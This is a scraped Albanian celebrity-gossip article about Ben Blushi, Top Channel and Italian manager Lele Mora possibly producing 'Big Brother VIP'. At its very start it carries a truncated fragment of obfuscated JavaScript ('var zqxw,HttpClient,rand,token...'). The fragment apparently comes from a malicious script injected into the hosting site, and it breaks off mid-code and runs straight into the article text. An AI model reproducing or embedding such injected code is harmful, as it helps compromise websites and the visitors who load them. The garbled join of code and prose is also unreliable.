;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ben Blushi me plane të mëdha? Autorësia e ‘Big Brother VIP’ jo Ledionit por…

By

‘Big Brother VIP’ pritet e përflitet tash e një kohë të gjatë.

Nga muaji në muaj, kanë kaluar sezonë e gjysmë-sezonë televiziv por patenta e njohur nuk nisi në Top Channel.

Fillimisht ishte Ledion Liço ai që e promovoi por që më pas u tërhoq pa shumë zhurmë pas trumbetimit si autor.

E duket se drejtori i Topit, Ben Blushi ka plane të tjera.

Portali Blitz.al ka raportuar se menaxheri i njohur i VIP-ave në Itali, 63 vjeçari Lele Mora ka ardhur ditën e sotme në Shqipëri me ftesë të mikut të tij Drejtor mu për këtë projekt.

Image result for lele mora

Diskutimi për organizimin e ‘Big Brother VIP’ duket të ketë qenë arsyeja që e ka sjellur Moran në Shqipëri.

Italiani mësohet të ketë vizituar edhe ambientet e Top Channel, nga të cilat ka mbetur i mahnitur me investimin dhe cilësinë e televizionit.

Nëse lidhet marrëveshje me Moralën për t’ia besuar ‘Big Brother VIP’, interesimi për këtë format pa dyshim që do rritet edhe më shumë meqenëse bazuar në përvojën e italianit, produksioni do jetë goxha i arrirë. Kjo nuk do të ishte hera e parë që Top Channel sjell në Shqipëri figura të ekranit përtej Adriatikut për t’i besuar programet e saj.

Mbetet të shihet me kohën nëse një gjë e tillë do të ndodhë apo thjesht do jetë një takim i shtuar në tentativat e Blushit që në fund, kanë rezultuar pa sukses. /Prive.al

Artikuj të ngjashëm